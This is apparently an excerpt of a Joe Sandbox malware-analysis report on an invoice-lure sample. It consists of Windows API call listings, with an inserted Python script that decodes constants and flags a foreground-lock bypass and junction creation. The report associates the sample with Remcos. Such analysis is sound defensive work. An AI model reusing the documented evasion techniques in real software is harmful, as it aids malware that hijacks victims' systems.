                                                                            • ScreenToClient.USER32(?,?), ref: 00F5CF47
                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F5CFA3
                                                                            • SendMessageW.USER32 ref: 00F5CFD1
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F5D00E
                                                                            • SendMessageW.USER32 ref: 00F5D03D
                                                                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F5D05E
                                                                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F5D06D
                                                                            • GetCursorPos.USER32(?), ref: 00F5D08D
                                                                            • ScreenToClient.USER32(?,?), ref: 00F5D09A
                                                                            • GetParent.USER32(?), ref: 00F5D0BA
                                                                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F5D123
                                                                            • SendMessageW.USER32 ref: 00F5D154
                                                                            • ClientToScreen.USER32(?,?), ref: 00F5D1B2
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F5D1E2
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F5D20C
                                                                            • SendMessageW.USER32 ref: 00F5D22F
                                                                            • ClientToScreen.USER32(?,?), ref: 00F5D281
                                                                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F5D2B5
                                                                              • Part of subcall function 00ED25DB: GetWindowLongW.USER32(?,000000EB), ref: 00ED25EC
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00F5D351
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                                                                            • String ID: @GUI_DRAGID$F
                                                                            • API String ID: 302779176-4164748364
                                                                            • Opcode ID: 239d8294e1176b5566e23bda6774e1ad49b799d15705db875d6a518c49b909d9
                                                                            • Instruction ID: 61609895dcb59f2fd3ce9f2ff3fc0f085c60156815dbdffa94ff92abc9e3078c
                                                                            • Opcode Fuzzy Hash: 239d8294e1176b5566e23bda6774e1ad49b799d15705db875d6a518c49b909d9
                                                                            • Instruction Fuzzy Hash: F542BD34604344AFDB21CF24C844BAABBE5FF89722F140559FB96972B1C731D848EB92
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$_memset
                                                                            • String ID: 3c$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_
                                                                            • API String ID: 1357608183-3681475764
                                                                            • Opcode ID: bc33d6403e2491b15b0b41d92404b4105b6f9e90853b026e9e68025d42ce9e70
                                                                            • Instruction ID: 53627836395d1927634fd4d25edb825b5fc78dd6a8e5e6699906f57275201d6b
                                                                            • Opcode Fuzzy Hash: bc33d6403e2491b15b0b41d92404b4105b6f9e90853b026e9e68025d42ce9e70
                                                                            • Instruction Fuzzy Hash: 0493B575E04229DFDB24CF98D881BADB7B1FF48320F25816AE945EB281E7749D81DB40
                                                                            APIs
                                                                            • GetForegroundWindow.USER32(00000000,?), ref: 00ED48DF
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F0D665
                                                                            • IsIconic.USER32(?), ref: 00F0D66E
                                                                            • ShowWindow.USER32(?,00000009), ref: 00F0D67B
                                                                            • SetForegroundWindow.USER32(?), ref: 00F0D685
                                                                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F0D69B
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00F0D6A2
                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F0D6AE
                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F0D6BF
                                                                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 00F0D6C7
                                                                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 00F0D6CF
                                                                            • SetForegroundWindow.USER32(?), ref: 00F0D6D2
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F0D6E7
                                                                            • keybd_event.USER32(00000012,00000000), ref: 00F0D6F2
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F0D6FC
                                                                            • keybd_event.USER32(00000012,00000000), ref: 00F0D701
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F0D70A
                                                                            • keybd_event.USER32(00000012,00000000), ref: 00F0D70F
                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00F0D719
                                                                            • keybd_event.USER32(00000012,00000000), ref: 00F0D71E
                                                                            • SetForegroundWindow.USER32(?), ref: 00F0D721
                                                                            • AttachThreadInput.USER32(?,?,00000000), ref: 00F0D748
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 4125248594-2988720461
                                                                            • Opcode ID: 76ce4ff902b6de19ccdfc1f43803d3ac8530904eaf52728c6904fbf25026575b
                                                                            • Instruction ID: 9280b8fd6204d3c5e419d5c6c6cd0f4dcb6984662eff3d501e2963d85a613afe
                                                                            • Opcode Fuzzy Hash: 76ce4ff902b6de19ccdfc1f43803d3ac8530904eaf52728c6904fbf25026575b
                                                                            • Instruction Fuzzy Hash: 81317071A4031CBBEB206BA19C89F7F7E6CEB44B61F144065FB05EB1D1DAB05901BBA1
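The function record above (FindWindowW on Shell_TrayWnd, AttachThreadInput, MapVirtualKeyW/keybd_event with virtual key 0x12, SetForegroundWindow) and the later record that calls CreateDirectoryW, CreateFileW with flags 0x02200000 and DeviceIoControl with control code 0x000900A4 are only readable once the numeric arguments are decoded. The following is an added example, not part of the Joe Sandbox report and not AutoIt or Remcos code: it parses listing lines in the report's own `Api.MODULE(args), ref: ADDR` form (the sample input is copied from this report's listings), decodes the constants using the CTL_CODE layout from winioctl.h, the CreateFile flag bits from winnt.h and the virtual-key codes from winuser.h, and flags two sequences a reviewer cares about: the AttachThreadInput plus synthetic Alt press that defeats the foreground lock, and the OPEN_REPARSE_POINT handle plus FSCTL_SET_REPARSE_POINT that writes a directory junction. Function and key names in the verdict dictionary are this example's own choices; `?` in the listing is an argument the sandbox could not recover and is kept as `None`.

```python
"""Decode argument constants in Joe Sandbox "APIs" listings (added example)."""
import re
from typing import Dict, List, Optional

# Constructed input: a subset of the "APIs" lines copied from this report.
SAMPLE_CALLS = """\
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00F0D665
AttachThreadInput.USER32(?,00000000,00000001), ref: 00F0D6BF
MapVirtualKeyW.USER32(00000012,00000000), ref: 00F0D6E7
keybd_event.USER32(00000012,00000000), ref: 00F0D6F2
SetForegroundWindow.USER32(?), ref: 00F0D721
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F3A293
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F3A323
"""

CALL_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\), ref: (?P<ref>[0-9A-Fa-f]+)$"
)


def parse_calls(listing: str) -> List[Dict[str, object]]:
    """Parse 'Api.MODULE(arg,arg), ref: ADDR' lines. '?' marks an argument the
    sandbox could not recover from the stack; it is kept as None."""
    calls = []
    for line in listing.splitlines():
        m = CALL_RE.match(line.strip())
        if not m:
            continue
        raw = m.group("args")
        args = [None if a == "?" else a for a in raw.split(",")] if raw else []
        calls.append({"api": m.group("api"), "module": m.group("mod"),
                      "args": args, "ref": int(m.group("ref"), 16)})
    return calls


def arg_int(call: Dict[str, object], index: int) -> Optional[int]:
    """Hex literals in the listing are unprefixed; string arguments such as
    Shell_TrayWnd or *.* do not parse and yield None."""
    args = call["args"]
    if index >= len(args) or args[index] is None:
        return None
    try:
        return int(args[index], 16)
    except ValueError:
        return None


# CTL_CODE(DeviceType, Function, Method, Access) from winioctl.h:
#   (DeviceType << 16) | (Access << 14) | (Function << 2) | Method
def decode_ioctl(code: int) -> Dict[str, int]:
    return {"device": code >> 16, "access": (code >> 14) & 0x3,
            "function": (code >> 2) & 0xFFF, "method": code & 0x3}


FILE_DEVICE_FILE_SYSTEM = 0x9
FSCTL_NAMES = {41: "FSCTL_SET_REPARSE_POINT", 42: "FSCTL_GET_REPARSE_POINT",
               43: "FSCTL_DELETE_REPARSE_POINT"}


def ioctl_name(code: int) -> str:
    d = decode_ioctl(code)
    if d["device"] == FILE_DEVICE_FILE_SYSTEM and d["function"] in FSCTL_NAMES:
        return FSCTL_NAMES[d["function"]]
    return "unknown(device=0x%x, function=%d)" % (d["device"], d["function"])


# dwFlagsAndAttributes bits (winnt.h) that occur in this report's CreateFileW calls.
CREATEFILE_FLAGS = {0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
                    0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
                    0x00000080: "FILE_ATTRIBUTE_NORMAL"}
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU"}  # winuser.h


def decode_flags(value: int, table: Dict[int, str]) -> List[str]:
    """Name every known bit, lowest first; leftover bits are reported as hex."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append("0x%08x" % rest)
    return names


def summarise(listing: str) -> Dict[str, object]:
    """Decode the interesting arguments and evaluate two call-sequence verdicts."""
    calls = parse_calls(listing)
    apis = {c["api"] for c in calls}
    out: Dict[str, object] = {"ioctls": [], "createfile_flags": [], "synthetic_keys": []}
    for c in calls:
        if c["api"] == "DeviceIoControl" and arg_int(c, 1) is not None:
            out["ioctls"].append(ioctl_name(arg_int(c, 1)))
        elif c["api"] == "CreateFileW" and arg_int(c, 5) is not None:
            out["createfile_flags"].append(decode_flags(arg_int(c, 5), CREATEFILE_FLAGS))
        elif c["api"] == "keybd_event" and arg_int(c, 0) is not None:
            vk = arg_int(c, 0)
            out["synthetic_keys"].append(VK_NAMES.get(vk, "VK_0x%02x" % vk))
    # Attaching to the foreground thread's input queue and injecting an Alt press
    # before SetForegroundWindow is the classic way around the foreground lock.
    out["focus_steal"] = ({"AttachThreadInput", "SetForegroundWindow"} <= apis
                          and "VK_MENU" in out["synthetic_keys"])
    # A handle opened with OPEN_REPARSE_POINT|BACKUP_SEMANTICS followed by
    # FSCTL_SET_REPARSE_POINT writes a junction or symlink reparse point.
    out["junction_write"] = ("FSCTL_SET_REPARSE_POINT" in out["ioctls"] and any(
        "FILE_FLAG_OPEN_REPARSE_POINT" in f for f in out["createfile_flags"]))
    return out


if __name__ == "__main__":
    for key, value in summarise(SAMPLE_CALLS).items():
        print(key, value)
```

On the report's own input the decoder resolves 0x000900A4 to FSCTL_SET_REPARSE_POINT (device 9, function 41, METHOD_BUFFERED, FILE_ANY_ACCESS), 0x02200000 to FILE_FLAG_BACKUP_SEMANTICS|FILE_FLAG_OPEN_REPARSE_POINT, and virtual key 0x12 to VK_MENU. Read together with CreateDirectoryW before and RemoveDirectoryW on the failure path after, the later record is a junction-creation routine, and the record above is a forced window activation; both are generic runtime capabilities consistent with the compiled AutoIt interpreter this report identifies rather than evidence of what the script itself does, so treat them as context for the Remcos verdict, not as indicators on their own.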
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00F3C78D
                                                                            • FindClose.KERNEL32(00000000), ref: 00F3C7E1
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F3C806
                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00F3C81D
                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F3C844
                                                                            • __swprintf.LIBCMT ref: 00F3C890
                                                                            • __swprintf.LIBCMT ref: 00F3C8D3
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                            • __swprintf.LIBCMT ref: 00F3C927
                                                                              • Part of subcall function 00EF3698: __woutput_l.LIBCMT ref: 00EF36F1
                                                                            • __swprintf.LIBCMT ref: 00F3C975
                                                                              • Part of subcall function 00EF3698: __flsbuf.LIBCMT ref: 00EF3713
                                                                              • Part of subcall function 00EF3698: __flsbuf.LIBCMT ref: 00EF372B
                                                                            • __swprintf.LIBCMT ref: 00F3C9C4
                                                                            • __swprintf.LIBCMT ref: 00F3CA13
                                                                            • __swprintf.LIBCMT ref: 00F3CA62
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                                            • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                            • API String ID: 3953360268-2428617273
                                                                            • Opcode ID: cd323d428ea7f36112bae0cf240fcc9ceb1e70594c3e6f04d4df5e366c449e1a
                                                                            • Instruction ID: 7a96485285f989d5573b30427f61f4bdadfb1dbcf6a76cbd4fbd7b6e58e6fd18
                                                                            • Opcode Fuzzy Hash: cd323d428ea7f36112bae0cf240fcc9ceb1e70594c3e6f04d4df5e366c449e1a
                                                                            • Instruction Fuzzy Hash: 1AA11FB2404344ABC704EFA4CC85DAFB7ECFF95704F40191AF595D6292EA35DA09CB62
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00F3EFB6
                                                                            • _wcscmp.LIBCMT ref: 00F3EFCB
                                                                            • _wcscmp.LIBCMT ref: 00F3EFE2
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00F3EFF4
                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00F3F00E
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00F3F026
                                                                            • FindClose.KERNEL32(00000000), ref: 00F3F031
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00F3F04D
                                                                            • _wcscmp.LIBCMT ref: 00F3F074
                                                                            • _wcscmp.LIBCMT ref: 00F3F08B
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F3F09D
                                                                            • SetCurrentDirectoryW.KERNEL32(00F88920), ref: 00F3F0BB
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F3F0C5
                                                                            • FindClose.KERNEL32(00000000), ref: 00F3F0D2
                                                                            • FindClose.KERNEL32(00000000), ref: 00F3F0E4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                            • String ID: *.*
                                                                            • API String ID: 1803514871-438819550
                                                                            • Opcode ID: 625e63268b9242c9e93913c6942f1f37a4628cb0ca00ba996b95b482cef90d1e
                                                                            • Instruction ID: 8c1c72b55e9d9ef1f1145ee38466973233a0888ea9d5bd5ca682ba9e35fbc40d
                                                                            • Opcode Fuzzy Hash: 625e63268b9242c9e93913c6942f1f37a4628cb0ca00ba996b95b482cef90d1e
                                                                            • Instruction Fuzzy Hash: 2F31E772D0020D6ADB14ABB8DC48AEE77AC9F44371F1041B6F915E30A1DB70DA49EB61
                                                                            APIs
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F50953
                                                                            • RegCreateKeyExW.ADVAPI32(?,?,00000000,00F5F910,00000000,?,00000000,?,?), ref: 00F509C1
                                                                            • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00F50A09
                                                                            • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00F50A92
                                                                            • RegCloseKey.ADVAPI32(?), ref: 00F50DB2
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00F50DBF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Close$ConnectCreateRegistryValue
                                                                            • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                            • API String ID: 536824911-966354055
                                                                            • Opcode ID: 69dc055b02e31c7ef311f181af362f6618c5bc747bc0c8e1281990ac23d79fb7
                                                                            • Instruction ID: a11d5d6a4d5fc9abac7931613dbc711d6c6f7a89471c39a16c6a1d063df04789
                                                                            • Opcode Fuzzy Hash: 69dc055b02e31c7ef311f181af362f6618c5bc747bc0c8e1281990ac23d79fb7
                                                                            • Instruction Fuzzy Hash: 89026C756046019FCB14EF14C855E2AB7E5FF89724F04845DF999AB3A2DB30EC06DB81
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • DragQueryPoint.SHELL32(?,?), ref: 00F5C627
                                                                              • Part of subcall function 00F5AB37: ClientToScreen.USER32(?,?), ref: 00F5AB60
                                                                              • Part of subcall function 00F5AB37: GetWindowRect.USER32(?,?), ref: 00F5ABD6
                                                                              • Part of subcall function 00F5AB37: PtInRect.USER32(?,?,00F5C014), ref: 00F5ABE6
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00F5C690
                                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00F5C69B
                                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00F5C6BE
                                                                            • _wcscat.LIBCMT ref: 00F5C6EE
                                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00F5C705
                                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00F5C71E
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00F5C735
                                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 00F5C757
                                                                            • DragFinish.SHELL32(?), ref: 00F5C75E
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000233,?,00000000,?,?,?), ref: 00F5C851
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientDialogFinishLongNtdllPointProc_Screen_wcscat
                                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                            • API String ID: 2166380349-3440237614
                                                                            • Opcode ID: 596e39ade3173fbfe81b2793fdad72f80366a663b0fd4bd4b51cd18328052ce7
                                                                            • Instruction ID: 9f52bee595db24767585e51c8400fbd5e1695dacb4e820bea4ac2f0745eed3c3
                                                                            • Opcode Fuzzy Hash: 596e39ade3173fbfe81b2793fdad72f80366a663b0fd4bd4b51cd18328052ce7
                                                                            • Instruction Fuzzy Hash: 0B617F71108305AFC701EF64CC85DAFBBF8EF89751F00092EF695922A1DB719A49DB92
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00F3F113
                                                                            • _wcscmp.LIBCMT ref: 00F3F128
                                                                            • _wcscmp.LIBCMT ref: 00F3F13F
                                                                              • Part of subcall function 00F34385: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00F343A0
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00F3F16E
                                                                            • FindClose.KERNEL32(00000000), ref: 00F3F179
                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00F3F195
                                                                            • _wcscmp.LIBCMT ref: 00F3F1BC
                                                                            • _wcscmp.LIBCMT ref: 00F3F1D3
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F3F1E5
                                                                            • SetCurrentDirectoryW.KERNEL32(00F88920), ref: 00F3F203
                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00F3F20D
                                                                            • FindClose.KERNEL32(00000000), ref: 00F3F21A
                                                                            • FindClose.KERNEL32(00000000), ref: 00F3F22C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                            • String ID: *.*
                                                                            • API String ID: 1824444939-438819550
                                                                            • Opcode ID: 0d3616ac41d653a814db06e7dd1cc03caa71cbf2d494132e3f45e4f52a6ed34a
                                                                            • Instruction ID: 8b5fdfeb3ed9e008f8a1aff7d0fbd62e9c281682fbf69e5da23ca3eb5992184a
                                                                            • Opcode Fuzzy Hash: 0d3616ac41d653a814db06e7dd1cc03caa71cbf2d494132e3f45e4f52a6ed34a
                                                                            • Instruction Fuzzy Hash: 8231A276D0021DBADB20AAA4EC59AEF77AC9F85371F1041B5E910E20A0DB30DA4DEA54
                                                                            APIs
                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F3A20F
                                                                            • __swprintf.LIBCMT ref: 00F3A231
                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00F3A26E
                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00F3A293
                                                                            • _memset.LIBCMT ref: 00F3A2B2
                                                                            • _wcsncpy.LIBCMT ref: 00F3A2EE
                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00F3A323
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F3A32E
                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00F3A337
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00F3A341
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                             • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
